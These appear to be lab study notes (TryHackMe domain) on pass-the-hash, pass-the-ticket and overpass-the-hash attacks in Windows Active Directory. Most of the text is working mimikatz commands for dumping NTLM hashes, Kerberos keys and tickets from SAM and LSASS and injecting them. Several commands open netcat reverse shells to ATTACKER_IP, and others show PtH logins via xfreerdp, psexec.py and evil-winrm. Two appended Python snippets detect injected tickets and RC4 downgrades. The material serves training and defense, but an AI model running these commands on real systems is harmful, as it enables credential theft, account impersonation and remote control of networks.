Alternate Authentication Material

PRACTICE ! PRACTICE ! PRACTICE !

By alternate authentication material, we refer to any piece of data that can be used to access a Windows account without actually knowing a user's password itself

This is possible because of how some authentication protocols used by Windows networks work

Pass The Hash Attacks

When extracting credentials from a host where we have attained administrative privileges (by using mimikatz), we might get clear-text passwords or hashes that can be easily cracked. If we aren't that lucky, we will end up with NTLM password hashes that we can't crack

  • Although it may seem we can't really use those hashes, the NTLM challenge sent during authentication can be responded to just by knowing the password hash

  • This means we can authenticate without requiring the plaintext password to be known

  • Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can Pass-the-Hash (PtH) and authenticate successfully

To extract NTLM hashes, we can either use mimikatz to read the local SAM or extract hashes directly from LSASS memory

Extracting NTLM hashes from local SAM

This method will ONLY allow you to get hashes from local users on the machine

No domain user's hashes will be available

mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # lsadump::sam   
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 145e02c50333951f71d13c245d352b50

Extracting NTLM hashes from LSASS memory

This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine

mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # sekurlsa::msv 
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session           : RemoteInteractive from 2 
User Name         : bob.jenkins
Domain            : ZA
Logon Server      : THMDC
Logon Time        : 2022/04/22 09:55:02
SID               : S-1-5-21-3330634377-1326264276-632209373-4605
        msv :
         [00000003] Primary
         * Username : bob.jenkins
         * Domain   : ZA
         * NTLM     : 6b4a57f67805a663c818106dc0648484

We can then use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell

mimikatz # token::revert
mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Notice we used token::revert to re-establish our original token privileges, as trying to pass-the-hash with an elevated token won't work

This would be the equivalent of using runas /netonly but with a hash instead of a password and will spawn a new reverse shell from where we can launch any command as the victim user

Passing the Hash Using Linux

  • Connect to RDP using PtH

xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

  • Connect via psexec using PtH

psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP

Note: Only the Linux version of psexec supports PtH.

  • Connect to WinRM using PtH

evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

Pass The Ticket Attacks

Sometimes it will be possible to extract Kerberos tickets and session keys from LSASS memory using mimikatz

The process usually requires us to have SYSTEM privileges on the attacked machine

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

Notice that if we only had access to a ticket but not its corresponding session key, we wouldn't be able to use that ticket; therefore, both are necessary

Mimikatz can extract any TGT or TGS available in the memory of the LSASS process. Most of the time we'll be interested in TGTs, as they can be used to request access to any service the user is allowed to access

  • At the same time, TGSs are only good for a specific service - Extracting TGTs will require us to have administrator credentials, while extracting TGSs can be done with a low-privileged account

Once we have extracted the desired ticket, we can inject the tickets into the current session with the following command

mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi

Injecting tickets in our own session doesn't require administrator privileges - After this, the tickets will be available for any tools we use for lateral movement

To check if the tickets were correctly injected, you can use the klist command

za\bob.jenkins@THMJMP2 C:\> klist

Current LogonId is 0:0x1e43562

Cached Tickets: (1)

#0>     Client: Administrator @ ZA.TRYHACKME.COM
        Server: krbtgt/ZA.TRYHACKME.COM @ ZA.TRYHACKME.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 4/12/2022 0:28:35 (local)
        End Time:   4/12/2022 10:28:35 (local)
        Renew Time: 4/23/2022 0:28:35 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: THMDC.za.tryhackme.com
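
The klist output above is itself a host-side indicator: the session belongs to za\bob.jenkins, yet the cached TGT was issued to Administrator. The following parser is added here and is not part of the original notes; it extracts that mismatch from the klist text (embedded verbatim as the sample input) and assumes each '#N>' block uses the 'Field: value' layout shown.

```python
import re
# The klist output shown above, embedded here as a constructed sample string.
KLIST_OUTPUT = """za\\bob.jenkins@THMJMP2 C:\\> klist

Current LogonId is 0:0x1e43562

Cached Tickets: (1)

#0>     Client: Administrator @ ZA.TRYHACKME.COM
        Server: krbtgt/ZA.TRYHACKME.COM @ ZA.TRYHACKME.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 4/12/2022 0:28:35 (local)
        End Time:   4/12/2022 10:28:35 (local)
        Renew Time: 4/23/2022 0:28:35 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: THMDC.za.tryhackme.com
"""

def parse_klist(text):
    """Return (session user, ticket dicts). The user comes from the DOMAIN\\user@HOST
    prompt; each '#N>' block becomes one dict of its 'Field: value' lines."""
    m = re.search(r"^([^\\\s]+)\\([^@\s]+)@(\S+)", text, re.M)
    session_user = m.group(2) if m else None
    tickets, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if re.match(r"#\d+>", line):            # a new cached ticket starts here
            cur = {}
            tickets.append(cur)
            line = line.split(">", 1)[1].strip()
        if cur is None or ":" not in line:      # header lines and the flags line
            continue
        key, val = line.split(":", 1)
        cur[key.strip()] = val.strip()
    return session_user, tickets

def injected_tickets(session_user, tickets):
    """Flag cached tickets whose client principal is not the session's own user.
    After kerberos::ptt above, bob.jenkins's logon session holds a TGT issued to
    Administrator, which no normal logon produces."""
    out = []
    for t in tickets:
        client = t.get("Client", "").split(" @ ")[0]
        if client.lower() != session_user.lower():
            kind = "TGT" if t.get("Server", "").startswith("krbtgt/") else "TGS"
            out.append((client, kind, t.get("Server")))
    return out
```

klist only lists the calling logon session's cache, so a host-wide sweep has to be run per session (an administrator can target one with klist -li and its LUID).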

Overpass-the-hash / Pass-the-Key

This kind of attack is similar to PtH but applied to Kerberos networks

When a user requests a TGT, they send a timestamp encrypted with an encryption key derived from their password

  • The algorithm used to derive this key can be either DES, RC4, AES128 or AES256

  • If we have any of those keys, we can ask the KDC for a TGT without requiring the actual password, hence the name Pass-the-key (PtK)

We can obtain the Kerberos encryption keys from memory by using mimikatz

mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

Depending on the available keys, we can run the following commands in mimikatz to get a reverse shell via Pass-the-Key

If we have the RC4 hash

mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

Notice that when using RC4, the key will be equal to the NTLM hash of a user - This means that if we could extract the NTLM hash, we can use it to request a TGT as long as RC4 is one of the enabled protocols

This particular variant is usually known as Overpass-the-Hash (OPtH)

If we have the AES128 key

mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

If we have the AES256 key

mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
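
On the domain controller, a Pass-the-Key request made with the RC4 key shows up in event 4768 as a TGT encrypted with RC4-HMAC (etype 0x17) for an account that would normally be issued AES, which is the encryption-downgrade signal defenders look for. The following classifier is an added example, not from the original notes: the 4768 records and the per-account msDS-SupportedEncryptionTypes values are constructed, and the 0x1C fallback for accounts without that attribute is an assumption.

```python
# Kerberos encryption type codes as logged in the TicketEncryptionType field of
# event 4768 (a TGT was requested).
ETYPE_NAMES = {0x01: "DES-CBC-CRC", 0x03: "DES-CBC-MD5", 0x11: "AES128-CTS",
               0x12: "AES256-CTS", 0x17: "RC4-HMAC"}
AES_ETYPES = {0x11, 0x12}
# msDS-SupportedEncryptionTypes bits: 0x1 DES-CRC, 0x2 DES-MD5, 0x4 RC4,
# 0x8 AES128, 0x10 AES256. The per-account values below are constructed.
AES_BITS = 0x08 | 0x10
SUPPORTED_ETYPES = {"Administrator": 0x1C, "bob.jenkins": 0x1C, "svc_legacy": 0x04}

# Constructed 4768 records (not real DC logs); PreAuthType 2 is the encrypted
# timestamp described above.
TGT_REQUESTS = [
    {"TargetUserName": "Administrator", "IpAddress": "10.200.1.11",
     "TicketEncryptionType": 0x17, "PreAuthType": 2},
    {"TargetUserName": "bob.jenkins", "IpAddress": "10.200.1.11",
     "TicketEncryptionType": 0x12, "PreAuthType": 2},
    {"TargetUserName": "svc_legacy", "IpAddress": "10.200.1.20",
     "TicketEncryptionType": 0x17, "PreAuthType": 2},
]

def assess_tgt_request(ev, supported=SUPPORTED_ETYPES):
    """Classify one 4768 event.
    "downgrade":   RC4/DES ticket for an account that advertises AES. A normal
                   Windows client would have negotiated AES, so the weaker key
                   was most likely supplied directly (sekurlsa::pth /rc4).
    "weak-config": RC4/DES ticket for an account that only supports RC4/DES;
                   expected behaviour, but it leaves the NTLM hash usable as a
                   Kerberos key until the account is moved to AES.
    None:          AES ticket, nothing to flag."""
    etype = ev["TicketEncryptionType"]
    if etype in AES_ETYPES:
        return None
    bits = supported.get(ev["TargetUserName"], 0x1C)  # assumed default: RC4+AES
    return "downgrade" if bits & AES_BITS else "weak-config"

def find_overpass_candidates(events, supported=SUPPORTED_ETYPES):
    """Return (user, source IP, etype name, verdict) for every non-AES TGT."""
    hits = []
    for ev in events:
        verdict = assess_tgt_request(ev, supported)
        if verdict:
            etype = ETYPE_NAMES.get(ev["TicketEncryptionType"], hex(ev["TicketEncryptionType"]))
            hits.append((ev["TargetUserName"], ev["IpAddress"], etype, verdict))
    return hits
```

Restricting the enabled Kerberos encryption types to AES (on the account attribute and in the DC's Kerberos encryption-types policy) makes the KDC refuse the RC4 request outright, which is the mitigation the "as long as RC4 is one of the enabled protocols" condition above points at.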
